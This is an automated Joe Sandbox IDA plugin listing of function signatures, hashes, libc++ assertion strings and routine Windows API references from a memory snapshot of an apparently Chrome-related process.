                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$1U!S$1U!S
                                                    • API String ID: 4218353326-3107453488
                                                    • Opcode ID: 656da3e54df6a2fa817baadd45edfc4b64ba67cb961cab9d94067d84fb1e008e
                                                    • Instruction ID: 07a3c7b5c0db9229d0aafd591d06be99438d37af72169fbd1087d5a435e9173a
                                                    • Opcode Fuzzy Hash: 656da3e54df6a2fa817baadd45edfc4b64ba67cb961cab9d94067d84fb1e008e
                                                    • Instruction Fuzzy Hash: F1328071E002199FDB14CF98D881ABEB7B2FF84314F1AC159E946AB345D730AD46CBA1
                                                    APIs
                                                    Strings
                                                    • ), xrefs: 00DF77CA
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF77DE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$)
                                                    • API String ID: 4168288129-3378228832
                                                    • Opcode ID: 23ca503fe81f52cc745e79df135834455fac5ca5c035510875208ae354a52579
                                                    • Instruction ID: 83436c95b4bfe9a35c8434b80beae9cf110332987c657ee752460801f026f46d
                                                    • Opcode Fuzzy Hash: 23ca503fe81f52cc745e79df135834455fac5ca5c035510875208ae354a52579
                                                    • Instruction Fuzzy Hash: 86D17170A186098FCB19DF69C4915BEB7F2FF99310B29C62DD546EB344D730A8818B61
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f01260ebf20ca4b73e21e52b5d13809ae3c27eb3958df16668cd88b0e5e7c6e
                                                    • Instruction ID: 0408bdef31d7b72dd63743d8c1989a9b40250e937b8a3d13047a72d44fa1fa4c
                                                    • Opcode Fuzzy Hash: 3f01260ebf20ca4b73e21e52b5d13809ae3c27eb3958df16668cd88b0e5e7c6e
                                                    • Instruction Fuzzy Hash: 33023A71E012199BDF14CFA9D8846AEBBF1FF49314F2492AED519B7340D731AA41CB90
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D55F86
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 0-2888085009
                                                    • Opcode ID: 308355cf7cd43721667df03c97558bbb51f969ecea55989d4621ff7585ed65c8
                                                    • Instruction ID: 99e0ea3b4b607a392fde0aab017ee745e52ffc6409dad1eacc32f8238821f89a
                                                    • Opcode Fuzzy Hash: 308355cf7cd43721667df03c97558bbb51f969ecea55989d4621ff7585ed65c8
                                                    • Instruction Fuzzy Hash: 5922D271A01A05CFCB19CF28E490A29F7F2FF99310B298669EC859B355D730EC45CB51
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DC52E7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 4168288129-2888085009
                                                    • Opcode ID: a68b7d3db551e8e4893b4c2c61780b7eb9296f44b7aef4bb67383440c61389c2
                                                    • Instruction ID: 97c40ce951f4521dcbf5de03b6178366b53d6b13ad55f05af2d9db08f31d77e7
                                                    • Opcode Fuzzy Hash: a68b7d3db551e8e4893b4c2c61780b7eb9296f44b7aef4bb67383440c61389c2
                                                    • Instruction Fuzzy Hash: D612D371B04A068FCB18CF69D491B6DF7F2AF99350B29822DD446EB355E731E881CB60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: 0$0
                                                    • API String ID: 4218353326-203156872
                                                    • Opcode ID: 5ebb2ce745611ea88c19c8ef743140bc578f49ae6c3b459b63b41b89a7727b00
                                                    • Instruction ID: 802a9fa945d44deb0a350f93a55cbfc9bf4b32a78d601107816e9037f3940f2d
                                                    • Opcode Fuzzy Hash: 5ebb2ce745611ea88c19c8ef743140bc578f49ae6c3b459b63b41b89a7727b00
                                                    • Instruction Fuzzy Hash: 5912E175908745CFC720CF29C480A56F7E1FF98308F249A5DE8999B3A1E771E985CB82
                                                    Strings
                                                    • true, xrefs: 00D65DB3
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D65E22
                                                    • null, xrefs: 00D65DFF
                                                    • false, xrefs: 00D65DB8, 00D65DC8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ___std_exception_destroy
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$false$null$true
                                                    • API String ID: 4194217158-3559124831
                                                    • Opcode ID: 54a33560e7136ce1736eb64e488d384354bd320a96887fbba7647adcbe46ea15
                                                    • Instruction ID: 13db0f8f3cc0f80d74952a0376dd338b304444111d6d011af1ea753ba8aa0bbe
                                                    • Opcode Fuzzy Hash: 54a33560e7136ce1736eb64e488d384354bd320a96887fbba7647adcbe46ea15
                                                    • Instruction Fuzzy Hash: BC515B70B006058FDB00DF28E846AAE7BE1EF55304F188429F586AF3D6D631E945C7B1
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D53415
                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00D5341E
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 00D535C9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread
                                                    • String ID:
                                                    • API String ID: 135963836-0
                                                    • Opcode ID: 8d14876a52eb2d24310349c2c56f8f755e1db5fbd84abc1a6af231886b1cf4c8
                                                    • Instruction ID: 4a0d89c7013bbadff6dd0f4904811194c67eb519560f1de24da89fe922824e16
                                                    • Opcode Fuzzy Hash: 8d14876a52eb2d24310349c2c56f8f755e1db5fbd84abc1a6af231886b1cf4c8
                                                    • Instruction Fuzzy Hash: C9819B71B002149BCF19CF59E88096DB7F2BB94391B2C8569EC06DB351EB30EE49CB60
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00DF3B9D
                                                    • GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 00DF3BB4
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    • GetNativeSystemInfo.KERNEL32(00EF440C), ref: 00DF3C41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveInfoLock$AcquireNativeProductReleaseSystemVersion
                                                    • String ID:
                                                    • API String ID: 1555125601-0
                                                    • Opcode ID: 24483120eb4c6628f249f38494503af97e4edd742ccdcf87415cc9407f8dc448
                                                    • Instruction ID: ba1490c974882d5e0cf54163180851d6128f1dff66a773ebdb962d6156724f65
                                                    • Opcode Fuzzy Hash: 24483120eb4c6628f249f38494503af97e4edd742ccdcf87415cc9407f8dc448
                                                    • Instruction Fuzzy Hash: 4E3103B19002189FC710DB1AFC86AB777A0FBC9B14F0A8225F61937291D7306D19CB92
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00E4502E
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E45038
                                                    • UnhandledExceptionFilter.KERNEL32(-000002A3,?,?,?,?,?,?), ref: 00E45045
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: afc1f13ed4e05f045e92ea5d3f9d0993dba0634af5ae8fad4b240a0bf6274e4e
                                                    • Instruction ID: 67a2226c6fe57ca6dca18abaeb0eaa19e4a3069f348df750d019ea9b3ec1ce28
                                                    • Opcode Fuzzy Hash: afc1f13ed4e05f045e92ea5d3f9d0993dba0634af5ae8fad4b240a0bf6274e4e
                                                    • Instruction Fuzzy Hash: 5331C47590122D9BCB21DF28E88978DBBF8BF48310F5451EAE41CA7261EB709F858F45
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E00D9F
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00E00E74
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E00D90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 0-3267226576
                                                    • Opcode ID: bbd3336143432fc0da86ac6cc97431f5c7a854adb6517fadf78d12e87c7b3150
                                                    • Instruction ID: ef2aaafa5cdc9b1fa63d08d72f26e75301f3543073e229839471a8a95c31db7f
                                                    • Opcode Fuzzy Hash: bbd3336143432fc0da86ac6cc97431f5c7a854adb6517fadf78d12e87c7b3150
                                                    • Instruction Fuzzy Hash: 1712E571A042568FDB14CF58C8917AEBBB2FF85304F299669D8557B3C2C730A982CBD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2$ 2$X
                                                    • API String ID: 0-2071702916
                                                    • Opcode ID: 933aed46ee64780b6e0d4b36bddcf660c93df6502c0ffad13da26c41074426fa
                                                    • Instruction ID: 785988b923c9deae6e43b5c279b8d4176841727f1f9b2ae4fa5e32da206a2a16
                                                    • Opcode Fuzzy Hash: 933aed46ee64780b6e0d4b36bddcf660c93df6502c0ffad13da26c41074426fa
                                                    • Instruction Fuzzy Hash: 51023875608305DFCB18CF28C48096ABBE5FF88314F18896DF8999B391D731E985CB92
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DF3237
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                    • API String ID: 4218353326-3542035028
                                                    • Opcode ID: 7b6e20f9c79bb59a2fa9ba6922a8caa6e39c597e8a1b05e97faa9f5096fa69a7
                                                    • Instruction ID: 0088e8af026f7e655b8f2d4dc82dcb85612ef18a6035a0e62cab85812bb7cced
                                                    • Opcode Fuzzy Hash: 7b6e20f9c79bb59a2fa9ba6922a8caa6e39c597e8a1b05e97faa9f5096fa69a7
                                                    • Instruction Fuzzy Hash: 23F1C070A006098FDB14CF68D895A79BBF0FF49304F1A865DE94A9F352E730E951CBA1
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DB5C31
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                    • API String ID: 4218353326-3542035028
                                                    • Opcode ID: 3fb14a13e1d3960a9bf24b92dd5c356958ccffbb2f77fc90fad2f3c81c2d22f5
                                                    • Instruction ID: dda1f5ad9b8214b1897f176438a541990f3bd5668ac4e7bbe3472780c7cb0cf6
                                                    • Opcode Fuzzy Hash: 3fb14a13e1d3960a9bf24b92dd5c356958ccffbb2f77fc90fad2f3c81c2d22f5
                                                    • Instruction Fuzzy Hash: A8F1B370A00B05CFDB14CF18E895BA9BBE1FF49304F19465DE84AAB356E770E851CBA1
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000,00000000,73617720,73617720,?,?,00D4AF4E,00000000,00000000,00000000), ref: 00E072F2
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00E07530
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
